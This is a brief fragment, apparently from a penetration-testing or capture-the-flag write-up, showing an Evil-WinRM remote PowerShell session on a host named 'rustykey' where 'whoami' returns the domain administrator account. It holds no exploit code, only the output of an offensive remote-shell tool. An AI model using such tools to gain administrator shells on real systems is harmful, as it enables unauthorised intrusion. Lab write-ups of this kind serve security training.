Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
rustykey\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

Reply by Email